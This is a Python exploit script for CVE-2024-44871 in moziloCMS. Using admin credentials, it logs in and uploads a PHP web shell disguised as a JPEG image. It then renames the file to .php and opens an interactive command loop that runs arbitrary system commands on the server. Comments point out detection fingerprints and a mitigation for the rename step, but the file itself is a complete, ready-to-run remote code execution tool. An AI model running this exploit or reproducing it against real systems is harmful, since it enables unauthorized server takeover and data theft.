import requests
import argparse
import time
import uuid
import urllib
# Random 8-hex-character basename (first dash-separated group of a uuid4).
# Module-level because both upload_shell() and rename_file() read it: the
# upload uses "<file_name>.jpg" and the rename turns it into "<file_name>.php".
file_name = str(uuid.uuid4()).split("-")[0]
def login(session, target: str) -> bool:
    """POST the moziloCMS admin login form and report whether it succeeded.

    Args:
        session: a requests.Session; the cookie it receives from this
            request is what the later admin calls depend on.
        target: base URL including scheme and host, no trailing slash.

    Returns:
        True if the response body contains "moziloCMS Admin - Home",
        False otherwise.

    Note: reads the module-level names ``username`` and ``password``,
    which are only assigned in the ``__main__`` block below; importing
    this function elsewhere and calling it raises NameError.
    """
    # Every request from this script carries the same fixed Firefox 91
    # User-Agent plus "X-Requested-With: XMLHttpRequest" and a Referer
    # pointing at the files action — a stable fingerprint for log review.
    headers = {
        "Host": f"{target}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": f"{target}/admin/index.php?nojs=true&action=files&multi=true",
        "Origin": f"{target}",
    }
    data = {
        "username": f"{username}",
        "password": f"{password}",
        "login": "Login"
    }
    endpoint = "/admin/index.php"
    url = f"{target}{endpoint}"
    response = session.post(url=url, data=data, headers=headers)
    # Success is inferred from the page title of the admin home, not from
    # the HTTP status code.
    if "moziloCMS Admin - Home" in response.content.decode():
        return True
    return False
def upload_shell(session, target: str, payload: str) -> bool:
    """Upload ``payload`` as "<file_name>.jpg" through the admin file manager.

    Args:
        session: an authenticated requests.Session (see login()).
        target: base URL including scheme and host, no trailing slash.
        payload: file body; it is sent under an image/jpeg content type
            and a .jpg name, so a check that trusts only the declared
            type or the extension does not see PHP here.

    Returns:
        True if the response body contains the string '"delete_url"',
        False otherwise.

    Note: reads the module-level ``file_name``.
    """
    # Value is a (filename, bytes, content-type) triple for the multipart
    # field "files[]"; the client-declared type is image/jpeg regardless of
    # the actual content.
    files = {"files[]": [f"{file_name}.jpg", payload.encode(), "image/jpeg"]}
    # "curent_dir" (sic) is the application's own parameter spelling.
    data = {
        "curent_dir": "Willkommen",
        "chancefiles": "true",
        "action": "files"
    }
    headers = {
        "Host": f"{target}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": f"{target}/admin/index.php?nojs=true&action=files&multi=true",
        "Origin": f"{target}",
    }
    endpoint = "/admin/index.php"
    url = f"{target}{endpoint}"
    response = session.post(url=url, data=data, files=files, headers=headers)
    # The upload handler appears to answer with JSON; a "delete_url" key is
    # taken as the success marker.
    if '"delete_url"' in response.content.decode():
        return True
    return False
def rename_file(session, target: str) -> bool:
    """Ask the admin file manager to rename "<file_name>.jpg" to "<file_name>.php".

    This is the step where the extension changes: an upload-time extension
    allowlist alone does not cover it, so the rename action
    (changeart=file_rename) needs the same extension validation as the
    upload path to mitigate the issue.

    Args:
        session: an authenticated requests.Session (see login()).
        target: base URL including scheme and host, no trailing slash.

    Returns:
        True if the response body contains '"success' (partial JSON key
        match), False otherwise. Also prints the HTTP status code.

    Note: reads the module-level ``file_name``.
    """
    data = {
        "action": "files",
        "newfile": f"{file_name}.php",
        "orgfile": f"{file_name}.jpg",
        "curent_dir": "Willkommen",
        "changeart": "file_rename"
    }
    # Unlike the other two requests this one pins an explicit form
    # Content-Type; the remaining headers are the shared fingerprint.
    headers = {
        "Host": f"{target}",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": f"{target}/admin/index.php?nojs=true&action=files&multi=true",
        "Origin": f"{target}",
    }
    endpoint = "/admin/index.php"
    url = f"{target}{endpoint}"
    response = session.post(url=url, data=data, headers=headers)
    # Diagnostic only; the return value is decided by the body check below.
    print(f"REPSONSE CODE: {response.status_code}")
    if '"success' in response.content.decode():
        return True
    return False
def send_commands(session, target: str, endpoint: str) -> str:
    """GET ``target + endpoint`` and return the text between the first <pre> and </pre>.

    Args:
        session: requests.Session used for the request.
        target: base URL including scheme and host, no trailing slash.
        endpoint: path and query string appended verbatim to ``target``.

    Returns:
        The substring of the decoded body after the first "<pre>" and
        before the following "</pre>".

    Raises:
        IndexError: if the body contains no "<pre>" (split()[1] fails);
            a body with "<pre>" but no "</pre>" returns everything after it.
    """
    response = session.get(f"{target}{endpoint}")
    return response.content.decode().split("<pre>")[1].split("</pre>")[0]
if __name__ == "__main__":
    # Command-line entry point: login -> upload -> rename -> interactive loop.
    parser = argparse.ArgumentParser(prog='CVE-2024-44871', description='uploads webshell', epilog='PLEASE USE RESPONSIABLY')
    parser.add_argument("-p", help="enter password", required=True)
    parser.add_argument("-u", help="enter username", required=True)
    parser.add_argument("-t", help="target url with http/https but not ending with /", required=True)
    args = parser.parse_args()
    # These module-level names are what login() reads.
    username = args.u
    password = args.p
    target = args.t
    # PHP body of the uploaded file: when a "cmd" request parameter is
    # present it is passed unfiltered to system() and the output is wrapped
    # in <pre> tags, which send_commands() later extracts.
    payload = '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>'
    session = requests.Session()
    if login(session, target):
        # Fixed pauses between the three admin requests.
        time.sleep(1)
        if upload_shell(session, target, payload):
            time.sleep(1)
            if rename_file(session, target):
                print("shell has been activated\n")
                # Public path of the renamed file under the "Willkommen"
                # category; requests to a .php file in this directory with a
                # "cmd" query parameter are the indicator to alert on.
                file_dir = f"/kategorien/Willkommen/dateien/{file_name}.php?cmd="
                while True:
                    command = ""
                    try:
                        command = str(input("# "))
                        if command == "":
                            break
                    # Bare except also catches KeyboardInterrupt / EOFError,
                    # so Ctrl-C and EOF simply end the loop.
                    except:
                        break
                    # Relies on urllib.parse being loaded even though only
                    # "import urllib" appears at the top of the file.
                    system_response = send_commands(session, target, file_dir + urllib.parse.quote_plus(command))
                    print(system_response)
            else:
                print("[-] Failed to rename file to php")
        else:
            print("[-] Failed to upload shell")
    else:
        print("[-] Login failed")
    session.close()